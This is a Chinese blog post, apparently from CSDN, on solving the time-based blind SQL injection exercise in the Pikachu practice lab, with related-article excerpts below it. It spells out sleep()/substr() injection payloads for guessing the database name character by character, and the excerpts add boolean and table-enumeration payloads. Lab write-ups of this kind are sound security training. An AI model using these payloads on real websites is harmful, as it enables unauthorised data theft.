pikachu的盲注(base on time)

最新推荐文章于 2024-05-24 08:00:00 发布
最新推荐文章于 2024-05-24 08:00:00 发布
阅读量1k 收藏 3
点赞数 3
分类专栏: pikachu靶机 文章标签: 安全 mysql windows firefox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50339082/article/details/117911528
版权

pikachu的盲注(base on time)

打开pikachu测试平台。
在这里插入图片描述

先输入一个’ 尝试一下,发现反馈不报错。
在这里插入图片描述

输入kobe,发现反馈信息不变
在这里插入图片描述

打开浏览器的开发者工具(F12),控制台,选择网络。
在这里插入图片描述

输入 kobe’ and sleep(5)#,发现延迟5秒发送。
在这里插入图片描述

输入错误信息,发现sleep语句不执行
这样我们就可以写一个判断

kobe’ and if((substr(database(),1,1))=?,sleep(5),null)#

输入

kobe’ and if((substr(database(),1,1))=‘a’,sleep(5),null)#

发现,直接发送,没有暂停。
以此类推,直到输入

kobe' and if((substr(database(),1,1))='p',sleep(5),null)#

等待了5秒钟之后,才发送。说明猜测正确,数据库的首字母为p.
在这里插入图片描述

这样,一次基于时间的sqli盲注就完成了,也可以利用burpsuit批量破解得到自己想要的数据。

weixin_50339082
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
sql注入之pikachu盲注练习
windStudyer的专栏
05-21 786
sql注入pikachu盲注练习
pikachu——布尔盲注
Lollipop_zhi的博客
03-02 6564
基于boolean的盲注主要表现: 1.没有报错信息 2.不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或者1) 3.在正确的输入下,输入and 1=1/and 1= 2发现可以判断 首先用’来测试一下 然后输入kobe’ and 1=1#,当改成1=2时,显示“不存在”。此时,说明存在SQL注入点,因为会把我们输入的 1=1,1=2执行 输入kobe’ and ascii(substr(database(),1,1))>113# 显示“不存在” (因为手工
盲注base on time
北冥有鱼
04-02 314
上篇文章讲的基于boolean的盲注我们至少可以根据网页提示的0或1来进行一次一次的猜测,但是,如果网页永远只给你一个回复,那你就很难受了,我们都无法确定这是否是一个盲注点 但既然是靶场,那么我们还是有办法的 我们可以运用sleep()这个函数 sleep(5)的话,会让网页慢5秒钟执行 我们可以看到,这个地方慢了几秒 我们还是可以确认 我们输入的sleep()读入了后端的数据库,所以我们可...
PIKACHU--SQL注入
鲨鱼辣椒的博客
05-17 1157
SQL Inject(SQL)概述 注入漏洞在全球漏洞排行榜上一直高居榜首而注入漏洞中首当其冲的就是数据库注入漏洞,SQL注入漏洞主要的成因是子啊数据交互中,前端数据传入到后台处理时,没有做严格的过滤,导致传入后台的“数据”拼接到SQL语句中后,被当成SQL语句的一部分执行,从而产生与原本语句截然不同的意思,导致数据库受损(被脱裤、删除、甚至整个服务器权限沦陷) SQL注入流程 注入点探测 手动方式:手工构造SQL语句进行注入点发现 自动方式:采用自动扫描工具,自动进行注入点发现 信息获取 通过
SQL注入:pikachu靶场中的SQL注入通关
最新发布
qq_68163788的博客
05-24 1331
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
pikachu靶场&CSRF&SQL注入(三)
weixin_41665162的博客
08-04 472
文章目录CSRF概述CSRF-GETCSRF-POSTCSRF-TOKENSQL注入概述数字型注入字符型注入搜索型注入XX型注入insert/update/delete注入函数介绍注入原理 CSRF 概述 举个栗子: 用户想要修改自己的账户信息,那么他的修改流程是这样的 登陆账户—>修改信息&点击提交—>修改成功 这其中有两个要求,第一账有户密码(登陆权限)、第二有修改信息的链接格式;现在如果有个攻击者想要修改用户的信息,就要先获得一个修改链接,修改其中信息(链接可以自己注册账户,抓
pikachu盲注
miaositekali的博客
02-21 260
pikachu盲注
pikachu SQL 注入(盲注
weixin_60508121的博客
04-19 3741
SQL盲注 1.判断是否存在注入点 kobe' and 1=1# 正常返回结果 kobe' and 1=2# 返回空结果 2 2.猜测数据库长度(burp探测) kobe' and length(database())>=k # 数据库的长度为7 2. 猜测数据库名 kobe' and (select substr(database(),1,1))='k'# 得到数据库名为pikachu 3.盲注表名猜测 kobe' and length((sele..
[Pikachu靶场实战系列] SQL注入(盲注
00勇士王子的博客
07-29 3271
目录盲注布尔盲注时间盲注 盲注 盲注的意思就是说页面没有明显的回显,我们只能通过其他方式判断注入点。 常见的方式有两种,一种是布尔盲注,通过页面返回的不同状态判断语句是否被执行。另一种是时间盲注,通过页面加载时间来判断语句是否被执行。 布尔盲注 先输入一个之前关卡中的名字,返回正常 加上单引号,并没有报错,而是返回了我输入的信息不存在 加上注释符号后,返回又正常了,说明注入点存在,且就是单引号闭合 判断数据库名的长度 lucy’and length(database())>=1 # l
pikachu LINUX安装包,
07-14
上传到根目录,解压直接就问访问,里面有教程
pikachu-master
05-04
GRANT ALL PRIVILEGES ON pikachu.* TO 'pikachu'@'localhost' IDENTIFIED BY 'your_password'; FLUSH PRIVILEGES; ``` 请将`your_password`替换为你设定的密码。 4. 解压并安装Pikachu 将下载的pikachu-...
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu-master.zip
06-25
Pikachu靶场:全面理解与提升网络安全技能》 "Pikachu-master.zip"这个压缩包文件,无疑为我们提供了一个宝贵的网络安全学习资源——Pikachu靶场。靶场,是网络安全领域中的一个重要概念,它模拟真实网络环境,让...
pikachu.rar
03-05
这些实例涵盖了多种注入类型,如错误注入、时间盲注、联合查询注入等。通过这些实例,你可以学习到如何构造SQL注入语句,理解攻击者的思维模式,并学会如何编写安全的代码,防止此类漏洞的发生。 此外,"Pikachu"还...
pikachu盲注base on boolian)
weixin_50339082的博客
06-15 1306
pikachu盲注base on boolian) 发现只能存在kobe’ and 1=1 #连or 都会报错 利用and来构造payload: kobe' and ascii(substr(database(),1,1))=112# 利用burpsuit来进行测试,爆出database,不对的话就会出现用户名不存在,正确的话就会出现用户正确信息,可采用二分法来减少盲注次数。 ...
基于Pikachu测试平台的SQL注入-盲注
qq_43499389的博客
03-19 1136
什么是盲注 在有些情况下,后台使用了错误消息屏蔽方法(比如@)屏蔽了报错 此事无法再根据报错信息来进行注入的判断。这种情况下的注入,就是盲注 根据表现形式的不同,盲注又分为based boolean(基于真假)和based time(基于时间)两种类型。 基于boolean的盲注主要表现症状 1.没有报错信息 2.不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或1) 3.在正...
5-11sqli盲注-base on time盲注案例演示
山兔的博客
05-22 250
什么是盲注-based time 如果说基于boolean的盲注在页面上还可以看到0 or 1的回显,可以判断后端执行的情况,那么基于time盲注完全就啥都看不到了! 但还有一个条件,就是“时间”,通过特定的输入,判断后台执行的时间,从而确认注入! 常用的Teat Payload: kobe' and sleep(5)# 我们回到pikachu上面来,我们输入单引号 这个地方,没有报错,我们输入kobe 返回得是一样的结果,我们输入一个恶意的payload, kobe' and 1=1# 我们看一
盲注的练习(作业)
qq_43473164的博客
04-08 300
基于boolean的盲注 第一步 测试 payload:’ and 1=1#(页面不变) | ’ and 1=2#(页面变化) 说明存在sql漏洞. 第二步 盲注 爆表:payload:’ and ascii(substr((select table_name from information_schema.tables where table_schema=database()),1,1)...
pikachu——时间盲注
Lollipop_zhi的博客
03-02 4953
如果是布尔盲注,页面上会有0和1的变化,但是时间盲注页面无变化,所以我们需要监控时间,通过后台执行时间来判断 首先输入’测试一下,时间0毫秒 输入kobe’ and 1=1#,时间还是0毫秒 借助sleep()函数,输入kobe’ and sleep(3)#,时间发生了变化 输入kobe’ and if ((substr(database(),1,1))=‘p’,sleep=(5),null)#,产生了延迟 substr(database(),1,1):截取数据库名称的第一个字符。 判断是否.
pikachu 盲注
08-25
"PIKACHU"盲注是指基于时间或布尔值的盲注技术。盲注是一种注入攻击技术,没有页面回显来判断是否存在注入。基于时间的盲注是指攻击者通过在注入语句中添加延时函数来检测注入的结果是否延时。基于布尔值的盲注是指...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值